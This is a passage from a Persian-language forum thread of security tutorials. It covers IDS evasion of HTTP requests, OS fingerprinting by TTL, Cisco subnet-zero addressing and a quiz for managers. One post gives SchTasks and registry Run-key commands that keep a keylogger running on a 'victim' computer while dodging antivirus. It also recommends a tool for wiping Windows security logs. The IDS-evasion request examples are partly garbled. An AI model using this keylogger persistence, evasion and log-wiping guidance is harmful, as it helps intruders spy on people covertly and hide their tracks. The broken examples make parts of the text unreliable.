LONGURL : أدرس درURL ارسالي شامل نام بسيار طولاني يك شاخه است كه اصل وجود ندارد در انتها اين نام كاركترهاي /../قرار مي گيرد بدين ترتيب در سرور از نام شاخه چشم پوشي مي کند
بعضي از سيستمهاي IDSفقط بخش اول از ادرسURLرا برسي مي كنند وتقاضاي شما صحيح خوانده خواهد شد
Cgi –bin /bvroken .cgi HTTP/1.0 / .. GET / this isbunnchofjunktomaketh URL long/
Fake parameter:url ارسالي شما شامل پارامترهائي است كه هيچ خاصيت يا ضرري ندارد فقط شكل URL رابگونهاي تغيير مي دهد تا به الگوي حمله شبيه نباشد وIDS أنرا مجاز بداند
GET / index. Html �param=/../cgi-bin/broken .cgi HTTP /1.0
TABsseparetion بخشهاي مختلف URL ارسالي بجاي آنكه با كاركتر فاصله خالي (space)جدا شده باشد با كاركتر جدا مي شوند در اين حالت شكل URL بگونه اي تغيير مي كند تا به الگوي حمله شبا هت نداشته باشد و IDS أنرا مجاز بداند برخي از سيستمهاي IDS به اين نحوه گمراه شده وبه اين تقاضا اجازه اجرا مي دهند و برخي ديگرأنرا حذف مي كنند 
GET /bin broken /broken .cgi HTTP/1.0 
Case senistiivity: برخي از سيستمهاي IDSانتظارURL با حروف كوچك انگليسي دارند وليكن در تعدادي از سرور هاي وب مثل IIS در ويندوز ارسال URL با حروف بزرگ و كوچك فرق نمي كنند و قابل اجراست و بدين ترتيب سيستم IDS را براحتي فريب مي هيد و تقاضاي ارسالي شما اجرا مي شود 
GET/ CGI-BIN/broken .cgi HTTP /1.0 
Windows delimiter در سيستم عامل ويندوز استفاده از علامت بجاي (جدا كننده شاخه)مجاز شمرده مي شود در حاليكه برخي از سيستمهاي IDS به أن حساسيت ندارند لذا در مورد شكل URLگمراه مي شوند .مثال:
GET /cgi –bin/ broken .cgi HTTP /1.0 
Session Splicing:بر خلاف نه روش قبلي Session Splicing در سطح لايه TCP پياده سازي کرده ايد و تقاضا شما ابتدا تكه تكه شده و در بسته هاي جدا گانه يك تا سه كاركتري ارسال ميي شود بسياري از سيستمهاي IDS توانائي بازسازي قطعات را ندارند و براي اين بست ها مجوز صادر مي كند 

NULL Method بسياري از سيستمهاي IDS براي تحليل رشته URL از توابع رشته اي استفاده مي كنند در بين رشته URL، كاركتر%00NULL Characterوجود داشته باشد توابع رشته اي آنرا بعنوان خاتمه رشته تلقي مي كنند وبدين نحو IDS گمراه مي شود در حاليكه URL اعتبار خود را از دست نخواهد داد اكثر سرورها وب از كاركتر %00 چشم پوشي مي كنند 
GET%00/ cgi-bin /broken .cgi HTTP /1.0 
مكانيزمهاي Whisker 
ابزارWhisker براي گول زدن و فرار از IDS سعي کرده تا رشته ارساليدر قالب از متود GET كه به فرا خواني اسكريپ CGI کند به شكلي که اصل خود را از دستبدهد و منجر به تحريك سيستم IDS نشود و پروتكل HTTPرا تفسير صحيح و معتبربدهد

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  2:00 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

سيستم عامل هدف را چگونه تشخيص دهيم ؟ 


يكي از راههايي كه برنامه هاي مانند nmap و ... براي تشخيص نوع سيستم عامل استفاده مي كنند استفاده از فيلد هاي بسته هاي دريافتي مي باشد.كه در مقالات قبل توضيح كامل داده شده . 
يكي از اين فيلد ها كه بسيار استفاده مي شود TTL مي باشد. ( TTL فيلد بسيار مهمي در بسته هاي TCP/IP مي باشد )
مثلا هنگامي كه يك سيستم معمولي را ping مي كنيد به شما يك زمان TTL مي دهد. مثلا به دستور زير را مشاهده كنيد :
C:\>ping xxx.xxx.xxx.xxx 
Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128 
Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128 
Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128 
Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128 

Ping statistics for 127.0.0.1: 
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds: 
Minimum =5ms, Maximum =12ms,Average = 6 ms

TTL=128 نشان مي دهد كه سيستم عامل هدف ، ويندوز مي باشد. به ليستي كه در زير آمده است توجه كنيد. همانطور كه مشاهده مي كنيد توسط فيلد هاي مشخصي مي توان به سيستم عامل و حتي دقيق تر به نسخه آن پي برد.
OS VERSION PLATFORM TTL WINDOW DF TOS
------ --------- -------- --- --- ------- -- ---
DC-OSx 1.1-95 Pyramid/NILE 30 8192 n 0
Windows 9x/NT Intel 32 5000-9000 y 0
NetApp OnTap 5.1.2-5.2.2 54 8760 y 0
HPJetDirect HP_Printer 59 2100-2150 n 0
AIX 4.3.x IBM/RS 60 006016000-16100 y 0
AIX 4.2.x IBM/RS 60 006016000-16100 n 0
Cisco 11.2 7507 60 65535 y 0
DigitalUnix 4.0 Alpha 60 33580 y 16
IRI X6.x SGI 60 61320 y 16
OS390 2.6 IBM/S390 60 32756 n 0
Reliant 5.43 Pyramid/RM1000 60 65534 n 0
FreeBSD 3.x Intel 64 17520 y 16
JetDirect G.07.x J3113A 64 5804-5840 n 0
Linux 2.2.x Intel 64 32120 y 0
OpenBSD 2.x Intel 64 17520 n 16
OS/400 R4.4 AS/400 64 8192 y 0
SCO R5 Compaq 64 24820 n 0
Solaris 8 Intel/Sparc 64 24820 y 0
FTX(UNIX) 3.3 STRATUS 64 32768 n 0
Unisys x Mainframe 64 32768 n 0
Netware 4.11 Intel 128 32000-32768 y 0
Windows 9x/NT Intel 128 5000-9000 y 0
Windows 2000 Intel 128 17000-18000 y 0
Cisco 12.0 2514 255 3800-5000 n 192
Solaris 2.x Intel/Sparc 255 8760 y 0

حتما مي دانيد كه مشخص شدن نوع سيستم عامل چه كمكي به يك هكر مي كند ؟ ولي زياد هم نمي شود به اين روش اعتماد كرد چون بسياري از سيستم عامل ها را مي تواند طوري تنظيم كرد كه فيلد هاي فوق را به صورت دروغين تغيير دهند.

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  2:00 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

مسيرياب هاي سيسكو و زير شبكه هاي صفر 
مطالبی از آموزش سیسکو و امنیت آن را در این پست می زارم .
مقاله تخصصی می باشد

زير شبكه
بطور كلي به شبكه اي گفته مي شود كه بخشي از يك شبكه ي بزرگ تر تشكيل ميدهددر شبكه هاي ip يك
شبكه بزرگ را به شبكه هاي كوچك تر تقسيم مي كنند تا با استفاده ازدو روش فضاي نشاني ip 
1-ترجمه نشاني شبكه 
2-ترجمه نشاني درگاه
باعث بهبود كارايي امنيت و جبران كمبود نشاني هاي شبكه شوند
براي استفاده از اولين زير شبكه . بايد به مورد هاي توجه شود كه در اين مقاله
به ان ها اشاره مي شود.
تشريح اولين و اخرين زير شبكه صفر
زماني كه شبكه به چند شبكه كوچك تر تقسيم مي شود ان اولين زير شبكه را زير شبكه صفر است 
مثال : 172.16.0.0
به طور پيش فرض اين رده داراي 16بيت ذخيره شده براي نمايش نشاني ميز بان است بنابراين
65534(2-2) نشاني قابل قبول وجود دارد حال فرض كنيد شبكه ي زير با قرض گرفتن 3بيت از
بيت هاي ميزبان .به هشت (2)شبكه كوچك تر تقسيم شود.
مثال: 172.16.0.0/19
پس زير شبكه ي صفر ناميده مي شود بايدتوجه کرد زيرا اولين شبكه پس از تقسيم شبكه به شبكه به عنوان زير شبكه صفر شناخت مي شود پس هيچ قاعده ي خاصي براي تعين زير شبكه ي صفر وجود ندارد
اكنون براي شناسايي اين زير شبكه مي توان نشاني ان را به پايه (2)برد
براي همين نيز به اين زير شبكه زيرشبكه صفر نام دارد به صورت که هر سه بيت 17و18و19 در زير شبكه ي صفر است 
تشريح زير شبكه تمام يك
اخرين زير شبكه در مجموعه ي زير شبكه هايي كه ايجاد شده را زير شبكه ي تمام يك ناميده مي شود
چرا به خاطر يك بودن بيت هاي 17و18و19 است
شكل هاي زير شبكه صفر و زير شبكه تمام يك
نبايد از زير شبكه صفر و زير شبكه ي تمام يك به عنوان زير شبكه فيزيكي استفاده نشود ودر سندهاي RFC 950 ذخيره كردن و اختصاص داد
اين دو زير شبكه را نمي توان براي زير شبكه ي فيزيكي به كار گرفت وبراي نشاني هاي شبكه وداده پراكني بسيار مفيد استروش سنتي محاسبه ي زير شبكه
براي همين درشبكه ها تعداد زير شبكه هاي اين دو زير شبكه را در محاسبه هاي خودبه حساب نمي اورد يعني اگر سه بيت براي زير شبكه مورد استفاده قرار گيرد پس از محاسبه 8=2 عدد 2 ازان كم مي شود
اين روش روش سنتي محاسبه ي زير شبكه هاست 
براي همين بود که قبلا استفاده از زير شبكه ي صفر كمتر بوده به كه دليل خاصيت ذاتي اين روش 
نشاني دهي تميز نشاني شبكه و زير شبكه غير ممكن به نظر مي رسيد براي مثال نشاني زير را از مثال قبلي در نظر بگيريد: 
مثال : 172.16.1.10 
اکنون اگر بخواهيم نشاني زير شبكه ي ان را به دست اوريد خواهيد داشت مثال : 172.16.0.0 كه شما ان را به چند زير شبكه تقسيم كرده ايد بنابر اين هر گاه شما يك شبكه را به چند زير شبكه تثسيم كنيد زير شبكه اي خواهيد داشت كه نشاني ان با نشاني شبكه ي اصلي تفاوتي ندارد .اين مسئله اغلب منشا اشتباه هاي بزرگي خواهد داشت
زير شبكه ي تمام يك نيز مانند همتاي خود زير شبكه ي صفر .به دليل ويژگي ذاتي ايكه دارد شناسايي نشاني داده پراكني شبكه ي صفر .به دلليل ويژگي ذاتي اي كه دارد شناسايي نشاني داده پراكني شبكه ي اصلي و اين زير شبكه را دشوار مي كند .براي مثال .در مثال قبلي .نشاني اخرين زير شبكه يا زير شبكه ي تمام يك ها عبارت است از : 172.16.224.0/19 
نشاني داده پراكني اين زير شبكه عبارت است :172.16.255.255 
كه برابر با نشاني داده پراكني شبكه ي اصلي .به صورت زير است :.172.16.0.0 
بنابراين هر گاه زير شبكه اي درست كنيد .شبكه اي خواهيد داشت كه نشاني داده پراكني ان با نشاني داده پراكني شبكه ي اصلي يكي است .به عبارت ديگر اگر مهندس شبكه .نشاني زير را به مسيرياب 15 خود اختصاص دهد : 172.16.230.1/19
هيچ تفاوتي بين نشاني داده پراكني زير شبكه اي كه مسير ياب در ان وجود دارد16.ونشاني داده پراكني شبكه ي اصلي 17وجود نخواهد داشت 
درحال حاضر .از زير شبكه هاي تمام يك .استفاده مي شود .بنابراين پيكربندي نادرست ان. 
مي تواند مشكل هاي جدي به وجود اورد .
در اين مثال مسير ياب هاي 2تا5 هر كدام به عنوان مسير ياب هاي دسترسي انجام وظيفه 
مي كنند. براي همين تعدادي خط ورودي غير همزمان يا (اي اس دي ان)دارند در اين مثال يك 
شبكه ي رده ي (سي) به چهار شبكه تقسيم شده است و به هر يك از ان ها نيز يك مسير ياب 
براي دسترسي اختصاص داده شده است 
علاوه بر اين خط هاي غير همزمان هر يك از مسير ياب ها به صورت زير پيكر بندي شده اند:
ip unnum e0
مسيرياب (1)براي دسترسي درست داراي مسير هاي ايستا است كه هر كدام از ان ها به يكي از 
مسيرياب هاي دسترسي اشاره مي كنند به همين ترتيب هر يك از مسير ياب هاي دسترسي توسط 
يك مسير پيش گزيده به مسيرياب (1)اشاره مي كنند 
جدول مسير يابي مسيرياب (1)مشابه جدول زير است:
مسيريابي مسيرياب (1)
c 195.1.2.0/24 E0
S 195.1.1.0/26 195.1.2.2
S195.1.1.64/26 195.1.2.3
S 195.1.1.128/26 195.1.2.4
S 195.1.1.19/26 195.1.2.5

مسيرياب هاي دسترسي نيز داراي پيكر بندي مشابهي هستند يعني ان ها نيز داراي مسير هاي پيش گزيده تعدادي مسير ميزبان براي خط هاي غير هم زمان در پيمان نقطه به نقطه هستند.
جدول مسير يابي ساير مسير ياب ها عبارت اند از :
مسير يابي مسير ياب (2)
C 195.1.2.0/24 E0
S 0.0.0.0/0 195.1.2.1
C 195.1.1.2/32async 1
C 195.1.1.5/32 async 2
C 195.1.1.8/32 async 3
C 195.1.1.13/32 async 4
C 195.1.1.24/32 async 6
C 195.1.1.31/32 async 8
C 195.1.1.32/32 async 12
C 195.1.1.32/32 async 12
C 195.1.1.62/32 async 18

مسير يابي مسير ياب(3)
C 195.1.2.0/24 E0
S 0.0.0.0/0 195.1.2.1
C 195.1.1.65/32 async 1
C 195.1.1.68/32 async 2
C 195.1.1.74/32 async 3
C 195.1.1.87/32 async 4
C 195.1.1.88/32 async 6
C 195.1.1.95/32 async 8
C 195.1.1.104/32 async 12
C 195.1.1.112/32 async 15
C 195.1.1.126/32 async 18

مسير يابي مسير ياب) 4)
C 195.1.2.0/24 E0
S 0.0.0.0/0 195.1.2.1
C 195.1.1.129/32 async 1
C 195.1.1.132/32 async 2
C 195.1.1.136/32 async 3
C 195.1.1.141/32 async 4
C 195.1.1.152/32 async 6
C 195.1.1.159/32 async 8
C 195.1.1.160/32 async 12
C 195.1.1.176/32 async 15
C 195.1.1.190/32 async 18

مسير يابي مسير ياب)5)
C 195.1.2.0/24 E0
S 0.0.0.0/0 195.1.2.1
C 195.1.1.193/32 async 1
C 195.1.1.197/32 async 2
C 195.1.1.200/32 async 3
C 195.1.1.205/32 async 4
C 195.1.1.216/32 async 6
C 195.1.1.223/32 async 8
C 195.1.1.224/32 async 12
C 195.1.1.240/32 async 15
C 195.1.1.252/32 async 18


چه پيش خواهد امد اگر ميزباني كه از طريق خط غير هم زمان به شبكه وصل شده است. 
به جاي نشاني الگوي زير شبكه 255.255.255.192
از نشاني الگو ي اشتباه زير استفاده كند:
225.255.255.0
در جواب بايد گفت همه چيز به خوبي كار مي كند)
حال ميزبان زير را در نظر بگيريد :
195.1.1.24
اين ميزبان مي خواهد پيام داده پراكني اي ارسال كند. به عبارت زير در بسته اي باويژگي هاي زير 
ارسال مي كند:
S :195.1.1.24 d :195.1.1.255
اين بسته توسط مسير ياب (2)دريافت مي شود .مسيرياب (2)ان را به مسير ياب (1)،و سپس به مسير ياب (5)مي دهد .اين عمل ان قدر تكرار مي شود تا بسته به انتهاي عمرخودبرسد.
در اين حالت ممكن است تصور كنيد به شبكه ي شما حمله شده است در حالي كه اشكال در درون
خود شبكه به وجودامده است.
در اين مثال.از يك حلقه ي مسير يابي استفاده شد كه وجود ان در شبكه معمو لا به عنوان اشكال 
مطرح مي شود.
مسيرياب (5)كه مسير يابي زير شبكه ي تمام يك را به عهده دارد تمام رفت وامد ايجاد شده توسط 
اين اشكال را تحمل مي كند مسير ياب هاي 2 تا4. فقط يك بار بسته هاي داده پراكني را دريافت مي كنند مسيرياب (1)هم فشار رفت و امد زيادي را تحمل مي كند اما اگر اين مسيرياب از گونه ي
(سيسكو7513)باشد چگونه اين وضعيت را تحمل مي كند در اين حالت بايد نشاني ميزبان هارابا الگوي درست نشان دهيد.
براي جلوگيري از كار نادرست ميزبان هايي كه به درستي تنظيم نشده اند.مي توان از رابط حلقه 
باز گشت براي هر مسير ياب دسترسي استفاده كرد ويك مسير ايستا براي نشاني زير درست كنيد:
195.1.1.255
هم چنين مي توانيد از رابط زير استفاده كنيد:
Nu110
اما انجام اين كار باعث ميشود مسيرياب (پيام پيمان نظارتي انترنت )را. به صورت زير در معناي عدم دسترسي به شبكه نمايش دهد :
unreachable

كاربردزير شبكه هاي صفرو تمام يك
باوجود غير تعارف بودن استفاده از اين دو مجموعه نشاني . كل فضاي نشاني دهي به همراه اين دو نشاني همواره قابل استفاده است استفاده از زير شبكه ي تمام يك. از قبل مجاز بود.
در حالي كه استفاده از زير شبكه صفر از زمان معرفي(سيسكو اي ا اس 12)شروع شد با اين وجود قبل از ارايه ي(سيسكواي ا اس 12)اين زير شبكه با استفاده از فرمان زير در تنظيم هاي عمومي 
مسير ياب هاي قابل استفاده بود :
ip subnet-zero
براي استفادهاز اين دو نشاني سندهاي (اراف سي 1878)امده است:
(حذف زيرشبكه ي صفروزير شبكه ي تمام يك ديگر منسوخ شده است:زيرا نرم افزار هاي جديد امروزي توانايي به كارگيري تمام شبكه هاتعريف شده را دارند )
امروز استفاده از زير شبكه ي صفر و زير شبكه تمام يك مجاز مي باشد وبيش تر توليدكنندگان اين ويژگي راپشتيباني ميكنند با اين وجود برخي شبكه هاي خاص هنوز از نرم افزارهاي قديمي استفاده مي كنندكه استفاده از زير شبكه صفر و زير شبكه ي تمام يك در ان ها مي تواند مشكل ساز باشد 
*****

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  2:04 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

چکيده اي از دستورات مورد نياز هکرها در ويندوز 
دستورات زير چکيده اي از دستورات مورد نياز مديران شبکه و البته هکرهاي عزيز است .

شما حتما با برنامه Scheduled Tasks در ويندوز کار کرده ايد . اين برنامه که رابطي در محيط گرافيکي دارد مي تواند طوري تنظيم شود که در يک زمان يک برنامه را اجرا کند.

توسط دستور SchTasks مي توان تنظيمات اين برنامه را به صورت Command-Line انجام داد .

به دليل ساده بودن سوييج ها از توضيح آنها صرف نظر کرده و فقط به مثال هايي از اين دستور اکتفا مي کنيم .

شکل کلي اين دستور به شکل زير است :



SchTasks /Create or ... /TN [TaskName] /TR [TaskToRun] /SC [ScheDuleType] /MO [ModiFier] 




در قسمت اول که مشخص مي کنيم ميخواهيم Task را ايجاد، پاک و يا ... کنيم .

در قسمت /TN نامي را براي Task خود انتخاب مي کنيم .

در قسمت /TR مسير برنامه اي را که مي خواهيم اجرا شود را مشخص مي کنيم . ( اگر فرد تيز هوشي باشيد مي توانيد دستورات خود را هم اجرا کنيد . به اين صورت که دستورات را داخل NotePad مي نويسيد و بعد با پسوند Bat ذخيره مي کنيد و بعد آدرس اين فايل را ميدهيد )

در قسمت /SC قالب اجراي برنامه را مشخص مي کنيد که مي تواند شامل Monthly - Weekly - Daily - Minute - Once - OnLogon - OnStart باشد .

و در قسمت /MO مي توان زمان و تاريخ اجراي برنامه را تعريف نمود . 

اين دستور برنامه ي مورد نظر را هر 10 دقيقه اجرا مي کند :

SchTasks /Create /TN "MOJY" /TR c:\windows\system32\Keyloger.exe /SC minute /MO 10


اين دستور برنامه ي مورد نظر را در هنگام بالا آمدن ويندور اجرا مي کند :

SchTasks Create /TN "MOJY" /TR c:\windows\system32\Keyloger.exe /SC onStart




از اين دستور بجاي اجراي خودکار برنامه از طريق ريجستري مي توان استفاده کرد و از دست AntiVirus تا حدودي فرار کرد . الته اگر فردي به اين دستورات کاملا تسلط داشته باشد با سوييچ /Query اين دستور مي تواند از اين موضوع مطلع شود .



با اضافه کردن سوييچ /SD به آخر اين دستور و دادن تاريخ مورد نظر به صورت mm/dd/yyyy ميتوان برنامه را در يک تاريخ معين اجرا کرد .



براي پاک کردن يک Task از سوييچ /Delete به صورت زير مي توان استفاده کرد :

SchTasks /Delete /TN [TaskName]


براي متوقف کردن Task بدين صورت مي توان عمل کرد :

SchTasks /End /TN [TaskName]


براي ديدن تمام Task ها بدين صورت عمل مي کنيم :

SchTasks /Query


بسته به خلاقيت شما ميتوان دستورهاي جالبي را خلق کرد .



يکي از مزييت هاي ديگر اين دستور اين است که ما نمي خواهيم هنگامي که داخل کامپوتر قرباني هستيم دستوري را اجرا يا برنامه اي را فعال کنيم چون ممکن است باعث گير افتادن ما شود . برنامه را کوک مي کنيم براي موقعي که ما از سيستم قرباني بيرون رفته ايم .



آيا مي دانيد که از طريق خط فرمان هم امکان ويرايش در Registry وجود دارد ؟

بله مي شود . با دستور Reg مي توان اين کار را عملي کرد .

به شرح اين دستور مي پردازيم .

همان طور که مي دانيد ريجستري داراي 5 شاخه يا RootKey مي باشد .

در اين دستور اين 5 شاخه به صورت زير تعريف شده اند :

HKEY_CURRENT_USER --> HKCU

HKEY_LOCAL_MECHINE --> HKLM

HKEY_CLASSES_ROOT --> HKCR

HKEY_USER --> HKU

HKEY_CURRENT_CONFIG --> HKCC


مقدار ها هم به صورت زير تعريف شده اند :

BINARY VALUE --> REG_BINARY

DWORD VALUE --> REG_DWORD

STRING VALUE --> REG_EXPAND_SZ




به دليل ساده بودن سوييج ها از توضيح آنها صرف نظر کرده و فقط به مثال هايي از اين دستور اکتفا مي کنيم .

براي پيدا نمودن يا انجام يک پرس و جو از يک مقدار در ريجستري بدين صورت عمل ميکنيم :

Reg Qurey [RootKey] /v [ValueName]

Reg Query HKLM\software\microsoft\windows\currentversion\Run /v Keyloger




براي ايجاد يک مقدار در ريجستري بدين صورت عمل مي کنيم :



Reg Add [RootKey] /v [ValeuName] /t DataType /d Data



Reg Add HKLM\software\microsoft\windows\currentversion\Run /v Keyloger /t REG_EXPAND_SZ /d '%systemRoot%\system32\keyloger.exe'




براي پاک کردن يک مقدار از ريجستري بدين عمل مي کنيم :

Reg Delete [RootKey] /v [ValueNme]

Reg Delete HKLM\software\microsoft\windows\currentversion\Run /v Keyloger




مديريت سرويس ها يکي از مهمترين کارهاي اساسي يک مدير شبکه است . 

Stop - Run - Disable - Enable 
کردن سرويس ها .

گرفتن اطلاعات در مورد يک سرويس خاص و کارهاي ديگري که در مديريت سرويس ها قابل انجام است .

همه اين کارها را از طريق خط فرمان و با دستور Sc مي توان انجام داد .

اين دستور داراي سوييچ هاي بسيار متعدد است که البته چند مورد از آنها که توضيح داده مي شود مور نياز ما هستند .

سوييچ هاي مورد نياز ما Qurey - Strat - Stop - Pause - Continue - Config مي باشند که در مورد هر کدام مثال هايي خواهيم زد .

براي ديدن تمام سرويس هاي Run - Disable و ... از اين دستور استفاده مي کنيم :

Local --> Sc Query Type= service state= all

Remote --> Sc \\[IP Address ] Query type= service state= all




براي ديدن تمام سرويس هاي فعال :

Sc Query type= service state= Active


براي ديدن تمام سرويس هاي غير فعال :

Sc Query type= service state= inactive


براي ديدن اطلاعات کامل در مورد يک سرويس :

Sc qc [ServiceName]


براي Start - Stop - Pause - Continue کردن يک سرويس به ترتيب :

Sc Start [ServixeName]

Sc Stop [ServixeName]

Sc Pause [ServixeName]

Sc Continue [ServixeName]


سرويس ها را به سه صورت مي شه Config کرد : Automatic - Manoel - Disable

Config 
کردن سرويس به صورت Automatic :

Sc Config [ServiceName] Start=Auto

Config 
کردن سرويس به صورت Manoel :

Sc Config [ServiceName] start=Demand

Config 
کردن سرويس به صورت Disable :

Sc Config [ServiceName] Start=Disabled




مديريت Log File ها نتنها در ويندوز بلکه در تمام سيستم عامل ها و وب سرور ها و در تمام روتين هاي امنيتي کاري بسيار مهم و ضروري است .

اين Log File ها مانند يک IDS کوچک هستنند . چرا که تمام فعاليت هاي امنيتي . کاربردي و سيستمي را Monitor کرده و از آنها Log بر ميدارند .

مطالعه اين فايلها در تشخيص نفوذ به ما خيلي کمک مي کنند .

سيستم عامل ويندوز داراي يک ابزار گرافيکي ويک ابزار خط فرمان براي مطالعه اين Log File ها مي باشد که ما ابزار خط فرمان ويندوز را توضيح ميدهيم .

با استفاده از فرمان EventQuery ميتوان اين فايل ها را مشاهده کرد .

EventQuery [LogNmae]


که براي ديدن Log هاي Security - Application - System به ترتيب از دستور هاي زير استفاده مي کنيم :

EvenQuery /L "Security"

EvenQuery /L "Application"

EvenQuery /L "System"


اما با اين دستور اين Log File ها را فقط مي توان مشاهده نمود و نمي توان آنها را ويرايش کرد .

توسط برنامه WinZapper که داراي حجم بسيار کمي هم هست مي توان به صورت Local نوع Log File را مشخص نمود و تک تک آن ها را پاک کرد .

اين برنامه رو مي توانيد از سايت http://www.NtSecurity.nu به صورت رايگان Download کنيد .



دستور Convert :

توسط اين دستور بدون نياز به Fdisk مجدد مي توان فت يک درايو را از Fat 16 به NTFS تغيير داد :

Convert [DraiveName]:/fs:NTFS

Convert c:/fs:NTFS

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  2:05 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

تست امنيت اطلاعات برای مديران 
متن زير يك تست سريع و آموزنده مي باشد كه به برخي از سوالات شما در زمينه امنيت اطلاعات پاسخ مي دهد. همانطور كه خواهيد ديد به صورت پرسش و پاسخ بيان شده است.
باب امنيت اطلاعات اغلب پيچيده مي باشد. بر همين اساس اين مبحث به برخي از سوالاتي كه ممكن است براي شما ايجاد شود ، پاسخ داده است و پيشنهاداتي را براي آن ارائه داده است تا به سادگي قبول كنيد كه سيستم هاي شما نيز ممكن است در معرض خطر قرار گيرد.

1-اگر امنيت اطلاعات را افزايش دهيم ، كارايي كاهش پيدا مي كند. درست يا غلط ؟
درست – امنيت اطلاعات هزينه مربوط به خودش را دارد. افزايش امنيت اطلاعات ممكن است به روالهاي موثر اضافي از جمله «تكنولوژي» و «سرمايه گذاري » نياز داشته باشد.
افزايش امنيت اطلاعات ممكن است پيشرفت جريان كار را با كندي مواجهه كند و اين امر ممكن است در كارايي افراد و شبكه شما نمود پيدا كند. امنيت اطلاعات ممكن است به معني قفل كردن ايستگاههي كاري و محدود كردن دسترسي به اتاقهاي كامپيوتر و سرور شما باشد. هر سازماني بايد هنگامي كه به مقوله امنيت اطلاعات مي پردازد به صورت انديشمندانه اي بين خطرات ( Risks ) و كارآيي توازن برقرار كند.

2-حملاتي كه توسط نفوذگران خارجي انجام مي گيرد نسبت به حملات كارمندان داخلي هزينه بر تر و خسارت بار تر مي باشد. درست يا غلط ؟
غلط- حملات كارمندان داخلي نوعا بسيار خسارت بار تر از حملات خارجي گزارش شده است. بر طبق آمارهاي انستيتو امنيت كامپيوتر (Compuetr Security Inistitu ) ميانگين حملات خارجي 57000 دلار و ميانگين هزينه حملات داخلي 2700000 دلار برآورد شده است. 
كارمندان داخلي اطلاعات محرمانه بيشتري درباره سيستم هاي هدف در دسترس دارند از آن جمله مي توان اطلاعاتي درباره فعاليت هاي ديده باني (Monitoring ) را نام برد (به خصوص نقاط ضعف اين فعاليتها )

3-پيكربندي يك ديواره آتش (Firewall ) به صورت كامل ما ر در مقابل حملات خارجي ايمن مي كند.درست يا غلط ؟
غلط – آمارهاي انستيو امنيت كامپيوتر نشان مي دهد كه 3/1 شركتهايي كه از ديواره آتش استفاده كرده اند هنوز از دست نفوذگران بد انديش در امان نمانده اند. اولين كاركرد ديواره آتش بستن پورتهاي مشخص مي باشد به همين دليل در بعضي از مشاغل نياز است كه بعضي از پورتها باز باشد. هر پورت باز مي تواند يك خطري را براي سازمان ايجاد كند و يك معبر براي شبكه شما باشد. 
ترافيكي كه از ميان يك پورت مي گذرد را بايد هميشه به صورت سختگيرانه اي ديده باني (Monitor ) كرد تا تمامي تلاشهايي كه منجر به نفوذ در شبكه مي شود شناسايي و گزارش شود. 
يك ديواره آتش به تنهايي نمي تواند يك راه حل جامع باشد و بايد از آن به همراه تكنولوژي هاي IDS (Intrusion Detection System ) و روشهاي تركيبي استفاده كرد.

4-اگر ديواره آتش من به صورت مناسبي پيكر بندي شود ديگر نيازي به ديده باني بيشتر ترافيك شبكه نمي باشد.درست يا غلط ؟
غلط – هميشه نفوذگران خبره مي توانند يك ديواره آتش را در هم شكنند و به آن نفوذ كنند. به همين دليل ديده باني كليدي براي هر برنامه امنيت اطلاعات مي باشد. فراموش نكنيد كه ديواره آتش نيز ممكن است هك شود و IDS ها راهي مي باشند براي اينكه بدانيد چه سيستم هايي در شرف هك شدن مي باشند.

5-ديواره هاي آتش بايد به گونه اي پيكربندي شوند كه علاوه بر ترافيك ورودي به شبكه ، ترافيك هاي خروجي را نيز كنترل كنند . درست يا غلط ؟
درست - بسياري از سازمانها توجه زيادي به محدود كردن ترافيك ورودي خود دارند ، اما در مقايسه توجه كمتري در مسدود كردن ترافيك خروجي از شبكه را دارند. خطرات زيادي ممكن است در درون سازمان وجود داشته باشد. يك كارمند ناراضي يا يك نفوذگر كه شبكه شما را در دست گرفته است ، ممكن است كه بخواهد اطلات حساس و محرمانه شما را براي شركت رقيب بفرستد.

6-امنيت اطلاعات به عنوان يك مبحث تكنولوژيكي مطرح است درست يا غلط ؟
غلط – امنيت اطلاعات يك پي آمد تجاري - فرهنگي مي باشد. يك استراتژي جامع امنيت طلاعات بايد شامل سه عنصر باشد: روالها و سياستهاي اداري ، كنترل دسترسي هاي فيزيكي ، كنترل دسترسي هاي تكنيكي . اين عناصر – اگر به صورت مناسبي اجرا شود – مجموعا يك فرهنگ امنيتي ايجاد مي كند. بيشتر متخصصين امنيتي معتقدند كه تكنولوژيهاي امنيتي فقط كمتر از 25 درصد مجموعه امنيت را شامل مي شوند. حال آنكه در ميان درصد باقيمانده آنچه كه بيشتر از همه نمود دارد ،« افراد » مي باشند. (كاربر انتهايي) افراد يكي از ضعيف ترين حلقه ها ، در هر برنامه امنيت اطلاعات مي باشند.

7-هرگاه كه كارمندان داخلي ناراضي از اداره اخراج شوند ، خطرات امنيتي از بين مي روند. درست يا غلط ؟
غلط – به طور واضح غلط است. براي شهادت غلط بودن اين موضوع مي توان به شركت Meltdown اشاره كرد كه لشكري از كارمندان ناراضي اما آشنا به سرقتهاي كامپيوتري براي خود ايجاد كرده بود. بر طبق گفته هاي FBI حجم فعاليتهاي خرابكارانه از كارمندان داخلي افزايش يافته است. همين امر سازمانها را با خطرات جدي در آينده مواجهه خواهد كرد.

